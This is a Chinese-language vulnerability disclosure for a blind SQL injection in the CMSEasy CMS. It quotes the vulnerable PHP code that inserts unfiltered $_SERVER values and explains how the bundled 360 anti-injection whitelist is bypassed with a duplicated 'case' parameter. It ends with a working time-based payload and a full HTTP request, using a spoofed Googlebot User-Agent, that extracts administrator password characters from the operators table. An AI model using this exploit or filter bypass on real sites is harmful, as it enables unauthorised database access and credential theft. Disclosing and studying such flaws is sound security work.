Cmseasy某处SQL盲注漏洞（绕过360防护）

### 简要描述： 注入..但是木回显 盲注了.. ### 详细说明： index.php 84行 stats::getbot(); 由于初始化的时候也没对$_SERVER做过滤的什么措施 导致的注入 stats.php 13行到78行 getbot 这个功能是看蜘蛛的记录 $_SERVER 没过滤 我们只需要把HTTP_USER_AGENT伪造成蜘蛛的就ok了 ``` public static function getbot() { $ServerName = $_SERVER["SERVER_NAME"]; $ServerPort = $_SERVER["SERVER_PORT"]; $ScriptName = $_SERVER["SCRIPT_NAME"]; $QueryString = $_SERVER["QUERY_STRING"]; $serverip = $_SERVER["REMOTE_ADDR"]; $GetLocationURL=self::geturl(); $agent1 = $_SERVER["HTTP_USER_AGENT"]; $agent=strtolower($agent1); $Bot=""; if(strpos($agent,"googlebot")>-1) { $Bot = "Google"; } if(strpos($agent,"mediapartners-google")>-1) { $Bot = "Google Adsense"; } if(strpos($agent,"baiduspider")>-1) { $Bot = "Baidu"; } if(strpos($agent,"sogou")>-1) { $Bot = "Sogou"; } if(strpos($agent,"yahoo")>-1) { $Bot = "Yahoo!"; } if(strpos($agent,"msn")>-1) { $Bot = "MSN"; } if(strpos($agent,"soso")>-1) { $Bot = "Soso"; } if(strpos($agent,"iaarchiver")>-1) { $Bot = "Alexa"; } if(strpos($agent,"sohu")>-1) { $Bot = "Sohu"; } if(strpos($agent,"sqworm")>-1) { $Bot = "AOL"; } if(strpos($agent,"yodaobot")>-1) { $Bot = "Yodao"; } if(strpos($agent,"iaskspider")>-1) { $Bot = "Iask"; } if(strlen($Bot)>0 &&!front::get('admin_dir')) { $stats = self::getInstance(); $insert = $stats->rec_insert(array('bot'=>$Bot,'url'=>$GetLocationURL,'ip'=>$serverip,'time'=>date('Y-m-d H:i:s'))); //拼接语句 然后进入了查询 但是并没有回显 我们只好 盲注了。时间的.. } } public static function geturl() { 这里 初始化的时候没有过滤.. if(!empty($_SERVER["REQUEST_URI"])) { $scrtName = $_SERVER["REQUEST_URI"]; $nowurl = $scrtName; }else { $scrtName = $_SERVER["PHP_SELF"]; if(empty($_SERVER["QUERY_STRING"])) { $nowurl = $scrtName; }else { $nowurl = $scrtName."?".$_SERVER["QUERY_STRING"]; } } return (isset($_SERVER["HTTPS"])&&$_SERVER["HTTPS"] == "on")?'https://':'http://'.$_SERVER['HTTP_HOST'].$nowurl; } ``` 这里还有个引入了360防注入的 很好绕过 ``` $webscan_white_url = array( array('index.php' => 'admin_dir=admin'), array('index.php' => 'case=file'), array('post.php' => 'job=postnew&step=post'), array('edit_space_info.php'=>''), array('index.php' =>'case=admin') ); ``` 里面有个 url 白名单 我们只需要 ndex.php?case=file&case=index 这样就行了. case被后面覆盖了~ exP： ``` /cmseasy/index.php?case=file&case=index&u=',(sELECT(IF(MID(PASSWORD,2,1)>'1',SLEEP(2),'OK'))FROM(cmseasy_operators)),'0')# ``` ### 漏洞证明： ``` GET /cmseasy/index.php?case=file&case=index&u=',(sELECT(IF(MID(PASSWORD,2,1)>'1',SLEEP(2),'OK'))FROM(cmseasy_operators)),'0')# HTTP/1.1 Host: 119.99.30.115 User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive ``` [<img src="https://images.seebug.org/upload/201406/25143851855842af5f0b34087f1b56f71049f301.png" alt="test.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/25143851855842af5f0b34087f1b56f71049f301.png) [<img src="https://images.seebug.org/upload/201406/25144122df4113533730e3d988f9a02e4002118e.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/25144122df4113533730e3d988f9a02e4002118e.png) [<img src="https://images.seebug.org/upload/201406/251443193998bdcf40761aa441ae6ef8b878d8ec.png" alt="aaa.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/251443193998bdcf40761aa441ae6ef8b878d8ec.png)